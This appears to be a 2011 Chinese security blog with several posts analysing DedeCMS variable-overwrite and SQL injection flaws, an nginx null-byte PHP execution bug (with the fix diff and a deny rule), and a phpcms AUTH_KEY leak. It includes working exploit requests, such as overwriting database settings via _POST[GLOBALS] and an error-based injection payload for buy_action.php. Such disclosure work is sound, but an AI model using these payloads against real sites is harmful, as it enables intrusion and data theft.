0x50sec.org » 漏洞代码

DedeCms 漏洞为什么能覆盖数据库配置变量

admin — Wed, 31 Aug 2011 04:17:51 +0000

这件事说来比较惭愧，之前发现Dedecms有这么一个严重的问题，也传言dede不用登击进后台.

在网上也考到mr_xhming同学的分析:

http://hi.baidu.com/mr_xhming/blog/item/5e6d6009d44b1f39e92488a5.html

底下还有大牛的评论

2009-06-14 00:01 | 回复

在文件common.inc.php先覆盖

$GLOBALS['cfg_dbhost'];
$GLOBALS['cfg_dbuser'];
$GLOBALS['cfg_dbpwd'];
$GLOBALS['cfg_dbname'];
$GLOBALS['cfg_dbprefix'];

然后才是初始化数据库类

//引入数据库类
require_once(DEDEINC.’/dedesql.class.php’);
//全局常用函数
require_once(DEDEINC.’/common.func.php’);
?>

当时我也纳闷，DedeCms变量覆盖漏洞为什么能覆盖数据库配置变量？因为覆盖(或者说创建)在前，赋值在后啊。

//include/common.inc.php

if (!defined('DEDEREQUEST')) { //检查和注册外部提交的变量 foreach($_REQUEST as $_k=>$_v) { if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) ) { exit('Request var not allow!'); } } foreach(Array('_GET','_POST','_COOKIE') as $_request) { foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v); //这里覆盖变量 } }

//系统相关变量检测
if(!isset($needFilter))
{
$needFilter = false;
}
$registerGlobals = @ini_get(“register_globals”);
$isUrlOpen = @ini_get(“allow_url_fopen”);
$isSafeMode = @ini_get(“safe_mode”);
if( preg_match(‘/windows/i’, @getenv(‘OS’)) )
{
$isSafeMode = false;
}

//Session保存路径
$sessSavePath = DEDEDATA.”/sessions/”;
if(is_writeable($sessSavePath) && is_readable($sessSavePath))
{
session_save_path($sessSavePath);
}

//系统配置参数
require_once(DEDEDATA.”/config.cache.inc.php”);

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数
if($_FILES)
{
require_once(DEDEINC.’/uploadsafe.inc.php’);
}

//数据库配置文件
require_once(DEDEDATA.’/common.inc.php’); //这里引入数据库配置文件
…

//data/common.inc.php 里面的内容

//数据库连接信息
$cfg_dbhost = ‘localhost’;
$cfg_dbname = ‘de2′;
$cfg_dbuser = ‘root’;
$cfg_dbpwd = ”;
$cfg_dbprefix = ‘dede_’;
$cfg_db_language = ‘utf8′;

看起来的样子是就算覆盖了$cfg_dbname这些变量但是后面的文章又给$cfg_dbname赋了值。

然后我以为只有那些系统变量在覆盖前没初始化的才可以覆盖利用，但是我利用这个漏洞是通过别的途径，运气好点也能搞到shell。当时根本没看懂fly大牛的评论(这个漏洞人家09年的时候就已经公布出来了？但是08年是利用$_FILES数组覆盖的。）当时网上爆的Dedecms的变量覆盖是$_FILES数组,其实除了这个还有更严重的，很多人都发现了但是没人爆出了，因为爆出来就没得玩了。但是Dedecms那帮家伙只知道修修补补，补了那个变量覆盖的时候就在旁边的更明显的都没发现。现在他们补了这个漏洞，还是有些别的严重的问题他们还是没补完。

扯的有点多，关键的问题还没解决。变量覆盖是存在的，但是怎么利用还不知道。

问题的根本就是: $cfg_dbname和$GLOBALS['cfg_dbname']到底是不是一回事？
我原来想当然的以为是一回事，其实根本不是那么回事。

我们可以做个实验：

把include/common.inc.php添加几行代码看一下：

echo '--------------------------------------------------------- '; echo '$GLOBALS[cfg_dbname]:'; var_dump($GLOBALS[cfg_dbname]); echo '--------------------------------------------------------- '; echo '$cfg_dbname'; var_dump($cfg_dbname); //数据库配置文件 echo '++++++++++++++++++++++++++++++++++++++++++++++++++++++++ '; require_once(DEDEDATA.'/common.inc.php'); echo '--------------------------------------------------------- '; echo '$GLOBALS[cfg_dbname]:'; var_dump($GLOBALS[cfg_dbname]); echo '--------------------------------------------------------- '; echo '$cfg_dbname'; var_dump($cfg_dbname); exit;

提交 http://127.0.0.1/de2/index.php?_POST[cfg_dbname]=1234

结果如下：

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
string '1234' (length=4)
---------------------------------------------------------

$cfg_dbname
string '1234' (length=4)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
string 'de2' (length=3)
---------------------------------------------------------

$cfg_dbname
string 'de2' (length=3)

提交:http://127.0.0.1/de2/index.php?_POST[GLOBALS][cfg_dbname]=1234

---------------------------------------------------------
$GLOBALS[cfg_dbname]:

string '1234' (length=4)
---------------------------------------------------------

$cfg_dbname
null
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
string '1234' (length=4)
---------------------------------------------------------

$cfg_dbname
string 'de2' (length=3)

现在发现得到了我们想要的结果了，因为其后引入的数据库类

if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init"))

{
 require_once(DEDEINC.'/dedesqli.class.php');

} else {

 require_once(DEDEINC.'/dedesql.class.php');

}

里面的初始化函数是这样的，用的$GLOBALS['cfg_dbname']变量完成的赋值。

function Init($pconnect=FALSE)
{
$this->linkID = 0;
$this->queryString = '';
$this->parameters = Array();
$this->dbHost   =  $GLOBALS['cfg_dbhost'];
$this->dbUser   =  $GLOBALS['cfg_dbuser'];
$this->dbPwd    =  $GLOBALS['cfg_dbpwd'];
$this->dbName   =  $GLOBALS['cfg_dbname'];
$this->dbPrefix =  $GLOBALS['cfg_dbprefix'];
$this->result["me"] = 0;
$this->Open($pconnect);
}

所以是可以覆盖的，因为$GLOBALS数组被覆盖后变成了一个普通数组(不再是PHP的超全局变量),$GLOBALS['cfg_dbname'] 并不再等同于$cfg_dbname .我原来也是认为一直等同的。

而Dedecms的数据库配置文件用的是$GLOBALS['cfg_dbname']变量。

经foreach循环覆盖$GLOBALS之后导致$GLOBALS不再是超全局变量了，他成了普通的数组了，所以$GLOBALS['cfg_dbname'] 不再等同于$cfg_dbname 这是问题的关键.
证明代码如下

< ?php
$_POST['GLOBALS']['cfg_dbname'] = '123';
var_dump($GLOBALS);
foreach($_POST as $k => $v)
{
$$k=$v;
}
echo '~~~~~~~~~~~~~~~~~~~~~~';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
echo '+++++++++++++++++++++++';
var_dump($GLOBALS);
$cfg_dbname = '456';
echo '-----------------------';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
?>

结果如下

array
  'GLOBALS' =>
    &array
  'HTTP_HOST' => string '127.1' (length=5)
  'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
  'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
  'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
  'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
  'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
  'HTTP_KEEP_ALIVE' => string '115' (length=3)
  'HTTP_CONNECTION' => string 'keep-alive' (length=10)
  'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
  'SystemRoot' => string 'C:\Windows' (length=10)
  'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
  'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
  'WINDIR' => string 'C:\Windows' (length=10)
  'SERVER_SIGNATURE' => string '' (length=0)
  'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
  'SERVER_NAME' => string '127.1' (length=5)
  'SERVER_ADDR' => string '127.0.0.1' (length=9)
  'SERVER_PORT' => string '80' (length=2)
  'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
  'REMOTE_ADDR' => string '127.0.0.1' (length=9)
  'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
  'SERVER_ADMIN' => string 'admin@localhost' (length=15)
  'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
  'REMOTE_PORT' => string '53482' (length=5)
  'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
  'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
  'REQUEST_METHOD' => string 'GET' (length=3)
  'QUERY_STRING' => string '' (length=0)
  'REQUEST_URI' => string '/5.php' (length=6)
  'SCRIPT_NAME' => string '/5.php' (length=6)
  'PHP_SELF' => string '/5.php' (length=6)
  'REQUEST_TIME' => int 1314794715
  '_POST' =>
    array
      'GLOBALS' =>
        array
          'cfg_dbname' => string '123' (length=3)
  '_GET' =>
    array
      empty
  '_COOKIE' =>
    array
      empty
  '_SERVER' =>
    array
      'HTTP_HOST' => string '127.1' (length=5)
      'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
      'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
      'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
      'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
      'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
      'HTTP_KEEP_ALIVE' => string '115' (length=3)
      'HTTP_CONNECTION' => string 'keep-alive' (length=10)
      'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
      'SystemRoot' => string 'C:\Windows' (length=10)
      'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
      'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
      'WINDIR' => string 'C:\Windows' (length=10)
      'SERVER_SIGNATURE' => string '' (length=0)
      'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
      'SERVER_NAME' => string '127.1' (length=5)
      'SERVER_ADDR' => string '127.0.0.1' (length=9)
      'SERVER_PORT' => string '80' (length=2)
      'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
      'REMOTE_ADDR' => string '127.0.0.1' (length=9)
      'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
      'SERVER_ADMIN' => string 'admin@localhost' (length=15)
      'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
      'REMOTE_PORT' => string '53482' (length=5)
      'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
      'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
      'REQUEST_METHOD' => string 'GET' (length=3)
      'QUERY_STRING' => string '' (length=0)
      'REQUEST_URI' => string '/5.php' (length=6)
      'SCRIPT_NAME' => string '/5.php' (length=6)
      'PHP_SELF' => string '/5.php' (length=6)
      'REQUEST_TIME' => int 1314794715
  '_ENV' =>
    array
      empty
  '_FILES' =>
    array
      empty
  '_REQUEST' =>
    array
      empty

~~~~~~~~~~~~~~~~~~~~~~
:123
+++++++++++++++++++++++

array
  'cfg_dbname' => string '123' (length=3)

-----------------------
456:123

Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx

admin — Thu, 25 Aug 2011 13:27:09 +0000

from：https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/

After publishing my previous blog post on PHP, nginx configuration, and potential arbitrary code execution, I came across a separate null-byte injection vulnerability in older versions of nginx (0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37). By taking advantage of this vulnerability, an attacker can cause a server that uses PHP-FastCGI to execute any publicly accessible file on the server as PHP.

In vulnerable versions of nginx, null bytes are allowed in URIs by default (their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h). Individual modules have the ability to opt-out of handling URIs with null bytes. However, not all of them do; in particular, the FastCGI module does not.

The attack itself is simple: a malicious user who makes a request to http://example.com/file.ext%00.php causes file.ext to be parsed as PHP. If an attacker can control the contents of a file served up by nginx (ie: using an avatar upload form) the result is arbitrary code execution. This vulnerability can not be mitigated by nginx configuration settings like try_files or PHP configuration settings like cgi.fix_pathinfo: the only defense is to upgrade to a newer version of nginx or to explicitly block potentially malicious requests to directories containing user-controlled content.

# This location block will prevent an attacker from exploiting

# this vulnerability using files in the 'uploads' or 'other_uploads' directory

location ~ ^/(uploads|other_uploads)/.*.php$

{

deny all;

}

Although the affected versions of nginx are relatively old (0.7.66 was released June 7th, 2010, 0.8.38 was released May 24th 2010), no mention of the change appears in the release notes. As a result, administrators may be running vulnerable servers without realizing their risk. I discovered a couple places where vulnerable packages were being distributed:

Ubuntu Lucid Lynx (Ubuntu’s current LTS offering) and Hardy Heron (via both the hardy and hardy-backports repositories) provided vulnerable versions of nginx via apt-get. The lucid and hardy packages have been updated: hardy-backports is awaiting approval. ^{[1] [2]}
Fedora provides a vulnerable version in its EPEL-4 repository. At this time, an updated package has not been released.

I sent several emails to igor@sysoev.ru regarding the vulnerability. I sent the first on June 24th and I sent followups on July 4th, July 20th, and August 2nd. I received the following reply to my August 2nd email:

Thank you for report.

I do not consider this as nginx security issue since every application
should validate its input data, so nginx passed the data to application.
Also this is PHP installation issue where scripts and user uploaded
data are not separated. This issue was discussed several times on mailing
list.

At some point I’ve decided that zero byte in URI should not appear
in any encoding, operating system, etc., and just makes more problems
than helps. So I have remove zero byte test.

For anyone who’s curious, the changes can be found at r3528 from svn://svn.nginx.org. At that time, it appears trunk corresponded to nginx 0.8: r3599 merged r3528 into the nginx 0.7 branch. The corresponding commit message is “remove r->zero_in_uri.” I’ve reproduced the output of svn diff below:

Index: src/http/ngx_http_request.h

===================================================================

--- src/http/ngx_http_request.h (revision 3527)

+++ src/http/ngx_http_request.h (revision 3528)

@@ -56,7 +56,7 @@

#define NGX_HTTP_PARSE_INVALID_HEADER 13

-#define NGX_HTTP_ZERO_IN_URI 1

+/* unused 1 */

#define NGX_HTTP_SUBREQUEST_IN_MEMORY 2

#define NGX_HTTP_SUBREQUEST_WAITED 4

#define NGX_HTTP_LOG_UNSAFE 8

@@ -435,9 +435,6 @@

/* URI with "+" */

unsigned plus_in_uri:1;

- /* URI with "\0" or "%00" */

- unsigned zero_in_uri:1;

-

unsigned invalid_header:1;

unsigned valid_location:1;

Index: src/http/ngx_http_core_module.c

===================================================================

--- src/http/ngx_http_core_module.c (revision 3527)

+++ src/http/ngx_http_core_module.c (revision 3528)

@@ -1341,7 +1341,7 @@

/* no content handler was found */

- if (r->uri.data[r->uri.len - 1] == '/' && !r->zero_in_uri) {

+ if (r->uri.data[r->uri.len - 1] == '/') {

if (ngx_http_map_uri_to_path(r, &path, &root, 0) != NULL) {

ngx_log_error(NGX_LOG_ERR, r->connection->log, 0,

@@ -2104,7 +2104,6 @@

ngx_log_debug2(NGX_LOG_DEBUG_HTTP, c->log, 0,

"http subrequest \"%V?%V\"", uri, &sr->args);

- sr->zero_in_uri = (flags & NGX_HTTP_ZERO_IN_URI) != 0;

sr->subrequest_in_memory = (flags & NGX_HTTP_SUBREQUEST_IN_MEMORY) != 0;

sr->waited = (flags & NGX_HTTP_SUBREQUEST_WAITED) != 0;

Index: src/http/ngx_http_special_response.c

===================================================================

--- src/http/ngx_http_special_response.c (revision 3527)

+++ src/http/ngx_http_special_response.c (revision 3528)

@@ -517,8 +517,6 @@

r->err_status = overwrite;

- r->zero_in_uri = 0;

-

if (ngx_http_complex_value(r, &err_page->value, &uri) != NGX_OK) {

return NGX_ERROR;

}

Index: src/http/ngx_http_upstream.c

===================================================================

--- src/http/ngx_http_upstream.c (revision 3527)

+++ src/http/ngx_http_upstream.c (revision 3528)

@@ -1815,10 +1815,6 @@

return NGX_DONE;

}

- if (flags & NGX_HTTP_ZERO_IN_URI) {

- r->zero_in_uri = 1;

- }

-

if (r->method != NGX_HTTP_HEAD) {

r->method = NGX_HTTP_GET;

}

Index: src/http/ngx_http_parse.c

===================================================================

--- src/http/ngx_http_parse.c (revision 3527)

+++ src/http/ngx_http_parse.c (revision 3528)

@@ -438,8 +438,7 @@

r->plus_in_uri = 1;

break;

case '\0':

- r->zero_in_uri = 1;

- break;

+ return NGX_HTTP_PARSE_INVALID_REQUEST;

default:

state = sw_check_uri;

break;

@@ -496,8 +495,7 @@

r->plus_in_uri = 1;

break;

case '\0':

- r->zero_in_uri = 1;

- break;

+ return NGX_HTTP_PARSE_INVALID_REQUEST;

}

break;

@@ -526,8 +524,7 @@

r->complex_uri = 1;

break;

case '\0':

- r->zero_in_uri = 1;

- break;

+ return NGX_HTTP_PARSE_INVALID_REQUEST;

}

break;

@@ -1202,7 +1199,7 @@

ch = *p++;

} else if (ch == '\0') {

- r->zero_in_uri = 1;

+ return NGX_HTTP_PARSE_INVALID_REQUEST;

}

state = quoted_state;

@@ -1304,8 +1301,7 @@

}

if (ch == '\0') {

- *flags |= NGX_HTTP_ZERO_IN_URI;

- continue;

+ goto unsafe;

}

if (ngx_path_separator(ch) && len > 2) {

@@ -1449,34 +1445,19 @@

void

ngx_http_split_args(ngx_http_request_t *r, ngx_str_t *uri, ngx_str_t *args)

{

- u_char ch, *p, *last;

+ u_char *p, *last;

- p = uri->data;

+ last = uri->data + uri->len;

- last = p + uri->len;

+ p = ngx_strlchr(uri->data, last, '?');

- args->len = 0;

+ if (p) {

+ uri->len = p - uri->data;

+ p++;

+ args->len = last - p;

+ args->data = p;

- while (p < last) {

-

- ch = *p++;

-

- if (ch == '?') {

- args->len = last - p;

- args->data = p;

-

- uri->len = p - 1 - uri->data;

-

- if (ngx_strlchr(p, last, '\0') != NULL) {

- r->zero_in_uri = 1;

- }

-

- return;

- }

-

- if (ch == '\0') {

- r->zero_in_uri = 1;

- continue;

- }

+ } else {

+ args->len = 0;

}

Index: src/http/modules/ngx_http_gzip_static_module.c

===================================================================

--- src/http/modules/ngx_http_gzip_static_module.c (revision 3527)

+++ src/http/modules/ngx_http_gzip_static_module.c (revision 3528)

@@ -89,10 +89,6 @@

return NGX_DECLINED;

}

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

gzcf = ngx_http_get_module_loc_conf(r, ngx_http_gzip_static_module);

if (!gzcf->enable) {

Index: src/http/modules/ngx_http_index_module.c

===================================================================

--- src/http/modules/ngx_http_index_module.c (revision 3527)

+++ src/http/modules/ngx_http_index_module.c (revision 3528)

@@ -116,10 +116,6 @@

return NGX_DECLINED;

}

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

ilcf = ngx_http_get_module_loc_conf(r, ngx_http_index_module);

clcf = ngx_http_get_module_loc_conf(r, ngx_http_core_module);

Index: src/http/modules/ngx_http_random_index_module.c

===================================================================

--- src/http/modules/ngx_http_random_index_module.c (revision 3527)

+++ src/http/modules/ngx_http_random_index_module.c (revision 3528)

@@ -86,10 +86,6 @@

return NGX_DECLINED;

}

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

if (!(r->method & (NGX_HTTP_GET|NGX_HTTP_HEAD|NGX_HTTP_POST))) {

return NGX_DECLINED;

}

Index: src/http/modules/ngx_http_dav_module.c

===================================================================

--- src/http/modules/ngx_http_dav_module.c (revision 3527)

+++ src/http/modules/ngx_http_dav_module.c (revision 3528)

@@ -146,10 +146,6 @@

ngx_int_t rc;

ngx_http_dav_loc_conf_t *dlcf;

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

dlcf = ngx_http_get_module_loc_conf(r, ngx_http_dav_module);

if (!(r->method & dlcf->methods)) {

Index: src/http/modules/ngx_http_flv_module.c

===================================================================

--- src/http/modules/ngx_http_flv_module.c (revision 3527)

+++ src/http/modules/ngx_http_flv_module.c (revision 3528)

@@ -80,10 +80,6 @@

return NGX_DECLINED;

}

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

rc = ngx_http_discard_request_body(r);

if (rc != NGX_OK) {

Index: src/http/modules/ngx_http_static_module.c

===================================================================

--- src/http/modules/ngx_http_static_module.c (revision 3527)

+++ src/http/modules/ngx_http_static_module.c (revision 3528)

@@ -66,10 +66,6 @@

return NGX_DECLINED;

}

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

log = r->connection->log;

/*

Index: src/http/modules/ngx_http_autoindex_module.c

===================================================================

--- src/http/modules/ngx_http_autoindex_module.c (revision 3527)

+++ src/http/modules/ngx_http_autoindex_module.c (revision 3528)

@@ -160,10 +160,6 @@

return NGX_DECLINED;

}

- if (r->zero_in_uri) {

- return NGX_DECLINED;

- }

-

if (!(r->method & (NGX_HTTP_GET|NGX_HTTP_HEAD))) {

return NGX_DECLINED;

}

Index: src/http/modules/perl/ngx_http_perl_module.c

===================================================================

--- src/http/modules/perl/ngx_http_perl_module.c (revision 3527)

+++ src/http/modules/perl/ngx_http_perl_module.c (revision 3528)

@@ -168,10 +168,6 @@

static ngx_int_t

ngx_http_perl_handler(ngx_http_request_t *r)

{

- if (r->zero_in_uri) {

- return NGX_HTTP_NOT_FOUND;

- }

-

r->main->count++;

ngx_http_perl_handle_request(r);

Dedecms变量覆盖导致的变量覆盖导致的注射

admin — Fri, 12 Aug 2011 14:28:11 +0000

好久没更新博客，再丢一个鸡肋。最近dedecms的那个变量覆盖漏洞很火貌似。可惜我还没研究透怎么利用好就被爆了，在人家手里好多年都不爆，有的家伙不知道是自己发现还是捡到了或者别人泄漏了就爆了～～～额真不和谐~~~

dedecms又一个magic_quote_gpc=Off的时候_RunMagicQuotes函数不起作用的例子。

by c4rp3nt3r@0x50sec.org

2011年5月

DedeCms 所有版本 buy_action.php注射漏洞
利用条件 magic_quote_gpc=Off

变量覆盖后存在注射漏洞

所有存在parse_str(mchStrCode($XX,DECODE)，$YY)的地方都是危险的。
SB的Dedecms害怕变量覆盖不了，还紧跟foreach循环强制覆盖。

注意parse_str函数会受magic_quotes_gpc的影响。

12 echo '------------------------'; 13 echo "pd_encode: ".$pd_encode.' cfg_cookie_encode: '.$cfg_cookie_encode; 14 echo '~~~~~~~~~~~~~~~~~~~~~~~~'; 15 echo md5("payment".$pd_encode.$cfg_cookie_encode); 16 17 if(isset($pd_encode) && isset($pd_verify) && md5("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify) 18 { 19 20 parse_str(mchStrCode($pd_encode,'DECODE'),$mch_Post); //非常和谐 21 22 foreach($mch_Post as $k => $v) $$k = $v; //非常和谐 23 $row = $dsql->GetOne("SELECT * FROM #@__member_operation WHERE mid='$mid' And sta=0 A ND product='$product'");

./data/sys_pay.cache.php

32 function mchStrCode($string,$action=’ENCODE’)
33 {
34     $key    = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['cfg_cookie_encode']),8,18);
35     $string = $action == ‘ENCODE’ ? $string : base64_decode($string);
36     $len    = strlen($key);
37     $code   = ”;
38     for($i=0; $i 39     {
40         $k      = $i % $len;
41         $code .= $string[$i] ^ $key[$k];
42     }
43     $code = $action == ‘DECODE’ ? $code : base64_encode($code);
44     return $code;
45 }

dedecms 报错最新版本有许多注射漏洞。

Error page:
/x/upload/member/buy_action.php?pd_encode=BxAAXQVSUVQHAxZeX11fEBRWDwFDU0BDRlABEkZSWkwHHwUbAgoN
VVlDHAEaVgkfHk8HRUdeDgtLHxEeHRFZQwADEFxfQ1JD&pd_veri
fy=0abb4ffcdc6379fcbaa6d0ac38aa71d6
Error infos: XPATH syntax error: ‘ 5.1.41-3ubuntu12.10′
Error sql: SELECT * FROM dede_member_operation WHERE mid=” and
extractvalue(1,concat(0×09,(version()))) limit 0,1;

只不过是个鸡肋

关于Dedecms的变量覆盖漏洞的利用

admin — Thu, 11 Aug 2011 13:01:01 +0000

最近有人爆出了dedecms的变量覆盖漏洞,这也是个挺有意思的漏洞，有的情况下dedecms的这个变量漏洞存在好久了在有的人手里都好多年了,大约半年前我也独立发现过
本文c4rp3nt3r@0x50sec.org
写于2011年5月

DedeCMS 任意变量覆盖漏洞的利用

Dedecms的变量覆盖漏洞总结
1.在magic_quotes_gpc=Off时
common.inc.php对原来的一维数组的$_GET原始数据没有进行addslashes，而是对一维数组的$$key进行了addslashes，导致filter.inc.php再次覆盖的时候使_RunMagicQuotes函数成了纸老虎。

2.common.inc.php
//检查和注册外部提交的变量，此处只检查一维数组的key，可以被绕过从而创建不允许的系统配置变量
我们可以通过下面的变量覆盖漏洞使用GET提交的方式创建出$_POST数组数据，创建是在检查之后的也就绕过了检查，创建出来之后，程序又将其注册成了变量。

3.filter.inc.php
这个文件在系统配置文件之后，里面有foreach循环创建变量，所以可以覆盖系统变量。

1.在magic_quotes_gpc=off的时候可以绕过_RunMagicQuotes的过滤！
xxx.php?site=c4rp3nt3r’s blog
经过common.inc.php
$c4rp3nt3r=c4rp3nt3r\’s blog
经过filter.inc.php
$c4rp3nt3r=c4rp3nt3r’s blog

2.创建系统变量

程序不允许创建cfg_开头的变量，依靠这样来防御系统变量未初始化漏洞。
common.inc.php文件的漏洞我们创建了系统变量就可以触发此类漏洞。
但是有的系统变量已经初始化了，而且是在common.inc.php文件foreach循环注册变量之后，就是说我们能创建，但是没法覆盖～～～
但是好玩的是filter.inc.php这个文件又进行了一次foreach循环也就是二次创建。所以如果包含了filter.inc.php文件我们就可以覆盖系统变量。

在/member目录的大部分文件都包含这么一个文件/member/config.php
这个文件的前两句就是
require_once(dirname(__FILE__).’/../include/common.inc.php’);
require_once(DEDEINC.’/filter.inc.php’);
就是说/member目录的大部分文件都受此漏洞影响可以覆盖系统变量。
其他目录的文件也不一定就是安全的，可以触发系统变量未初始化漏洞。

有两种利用方法
1.依赖于common.inc.php的变量创建和filter.inc.php的变量覆盖
//magic_quote_gpc=Off
我们提交
xxx.php?_GET[cfg_xx]=c4rp3nt3r’s blog
经过common.inc.php
$_GET[cfg_xx]=c4rp3nt3r\’s blog
经过filter.inc.php
$cfg_xx=c4rp3nt3r’s blog

2.依赖于common.inc.php的变量创建

提交
xxx.php?_POST[cfg_xx]=c4rp3nt3r’s blog
//检查和注册外部提交的变量
foreach($_REQUEST as $_k=>$_v) //此处只检查一维数组的key，可以被绕过从而创建不允许的系统配置变量
{
if( strlen($_k)>0 && eregi(‘^(cfg_|GLOBALS)’,$_k) ) //$_k=’_POST[cfg_xx]‘;绕过了正则
{
exit(‘Request var not allow!’);
}
}

foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)
{

foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
//如果提交xxx.php?_GET[cfg_xx]=c4rp3nt3r’s blog
//仅仅创建了$_GET[cfg_xx]但是第一次的循环$_GET已经执行完了,只能利用filter.inc.php的foreach循环变量覆盖来创建了
//如果我们提交xxx.php?_POST[cfg_xx]=c4rp3nt3r’s blog
//第一次执行$_GET循环后才创建出$_POST[cfg_xx],就不会进入上面的正则检查
//但是下一次进行$_POST循环时候正好注册我们的变量$cfg_xx=c4rp3nt3r\’s blog

}

phpcms的另一个phpcms_auth函数的加密密钥AUTH_KEY泄漏漏洞

admin — Tue, 05 Apr 2011 10:54:34 +0000

phpcms的另一个phpcms_auth函数的加密密钥AUTH_KEY泄漏漏洞
phpcms又一个鸡肋。
by c4rp3nt3r@0x50sec.org

phpcms的phpcms_auth函数的加密密钥AUTH_KEY泄漏会导致本地包含任意文件下载等多个漏洞。
而对phpcms2008有的本地包含又可以导致直接写shell和删除文件。所以泄漏了phpcms的phpcms_auth函数的加密密钥AUTH_KEY就可能直接导致被秒杀。

《phpcms的phpcms_auth导致的本地文件包含漏洞和任意文件下载漏洞》http://www.wooyun.org/bugs/wooyun-2010-01795
已经说明了两个破解”phpcms_auth函数的加密密钥AUTH_KEY”的方法，但是还不是很理想，最理想的是直接给我们足够的明文和密文。
是的开放的phpcms真的给我们这样的了，没有保留。

上一篇说到”破解了这个函数之后，一方面反而更加不安全了，另一方面所有建立在这个函数之上的机制可能都会受到攻击。”
其实一切建立在这个函数上的代码都可能给我们机会破解这个密钥。
来看magic_image函数，主要作用就是将字符串生成一个图片，这样做应该是为了防止别人采集网站上的数据，或者是防止泄漏隐私。
// include global.fun.php

function magic_image($txt, $fonttype = 4)
{
if(empty($txt)) return false;
if(function_exists(“imagepng”))
{
$txt = urlencode(phpcms_auth($txt, ‘ENCODE’, AUTH_KEY));
$txt = ‘‘;
}
return $txt;
}

在招聘、供求信息、跳蚤市场等多个功能模块都用到了这个函数。而且像供求信息、跳蚤市场貌似普通注册用户就能发贴。
发贴的时候在电话号码或邮箱那的字符就会被magic_image函数加密，显示给用户的时候又会调用magic_image.php文件，对字符串解密并进行生成图片。
就是说：
我们可以自定义明文
并且我们也可以得到明文加密后的密文

